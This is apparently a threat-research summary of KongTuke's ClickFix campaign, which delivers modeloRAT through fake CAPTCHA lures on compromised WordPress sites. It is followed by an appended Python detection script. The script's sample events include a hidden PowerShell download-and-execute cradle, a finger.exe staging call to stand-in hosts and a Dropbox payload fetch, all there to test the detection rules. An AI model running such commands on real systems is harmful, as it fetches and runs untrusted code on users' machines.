Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites

Summary: Trend Micro Research details how the KongTuke threat group continues to use compromised WordPress sites and fake CAPTCHA lures to deploy modeloRAT, a multi-stage malware.

Our analysis of an active KongTuke campaign deploying modeloRAT — malware capable of reconnaissance, command execution, and persistent access — through compromised WordPress sites and fake CAPTCHA lures shows that the group still operates this delivery chain in parallel with the newer CrashFix technique. The attack relies heavily on legitimate system tools and trusted services to avoid detection, using components such as PowerShell, finger.exe, Dropbox-hosted files, and portable Python environments. The malware can execute commands remotely, maintain persistence, and remain active on compromised systems while leaving minimal visible traces.

Key facts

  • The KongTuke threat group continues to use compromised WordPress sites and fake CAPTCHA lures to deliver modeloRAT.
  • modeloRAT is a multi-stage malware capable of reconnaissance, command execution, and persistent access.
  • Attackers inject malicious JavaScript into legitimate WordPress websites, prompting users to run a PowerShell command that triggers a multi-stage infection process.
  • The attack relies on legitimate system tools and trusted services to evade detection, and the resulting malware can execute commands remotely, maintain persistence, and remain active on compromised systems.
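The delivery chain summarised above (user-run PowerShell from a fake CAPTCHA, finger.exe and Dropbox-hosted files for staging, a portable Python runtime for the final stage) can be turned into process-creation detection rules. The following is an added illustration, not code from Trend Micro or the original report: it runs a few heuristics over constructed Sysmon-style events; the field names, rule names and sample command lines are assumptions, not indicators from the campaign.

```python
"""Detection heuristics for the KongTuke/ClickFix chain described on this page.
Events are constructed, simplified Sysmon Event ID 1 records (assumed fields)."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-case
    image: str    # child image name, lower-case
    cmdline: str  # full command line

# PowerShell download-cradle keywords; a user pasting a ClickFix command typically
# launches PowerShell from the Run dialog, so the parent is explorer.exe.
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|\biex\b|invoke-expression", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata)\\", re.I)

def classify(ev: ProcEvent) -> list[str]:
    """Return every rule name the event matches (empty list when nothing fires)."""
    hits = []
    if ev.parent == "explorer.exe" and ev.image == "powershell.exe" and DOWNLOAD_CRADLE.search(ev.cmdline):
        hits.append("clickfix_user_run_powershell_cradle")
    if ev.parent in ("powershell.exe", "cmd.exe") and ev.image == "finger.exe":
        hits.append("finger_lolbin_spawned_by_shell")   # finger.exe is rare in enterprise use
    if "dropbox.com" in ev.cmdline.lower() and ev.image in ("powershell.exe", "curl.exe", "finger.exe"):
        hits.append("dropbox_hosted_payload_fetch")
    if ev.parent == "powershell.exe" and ev.image == "python.exe" and USER_WRITABLE.search(ev.cmdline):
        hits.append("portable_python_from_user_writable_path")
    return hits

# Constructed sample events (hypothetical hosts and paths, not IoCs from the report).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", 'powershell -w hidden -c "iex (iwr https://example.invalid/c)"'),
    ProcEvent("powershell.exe", "finger.exe", "finger.exe user@example.invalid"),
    ProcEvent("powershell.exe", "powershell.exe", "powershell -c (iwr https://www.dropbox.com/s/PLACEHOLDER/p.zip?dl=1)"),
    ProcEvent("powershell.exe", "python.exe", r"C:\Users\u\AppData\Local\Temp\py\python.exe C:\Users\u\AppData\Local\Temp\py\m.py"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell -c Get-Date"),  # benign control
]

def scan(events=SAMPLE_EVENTS) -> dict[int, list[str]]:
    """Map the index of each flagged event to the rules it triggered."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

if __name__ == "__main__":
    for i, rules in scan().items():
        print(i, SAMPLE_EVENTS[i].image, rules)
```

Each rule alone is noisy in some environments; correlating two or more of them on the same host within a short window is what makes the chain stand out.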

Why it matters

This campaign poses a significant threat to organizations whose users browse compromised websites or encounter prompts asking them to run commands. It highlights the ongoing sophistication of threat actors in using legitimate-looking methods to evade detection and gain persistent access to corporate networks.
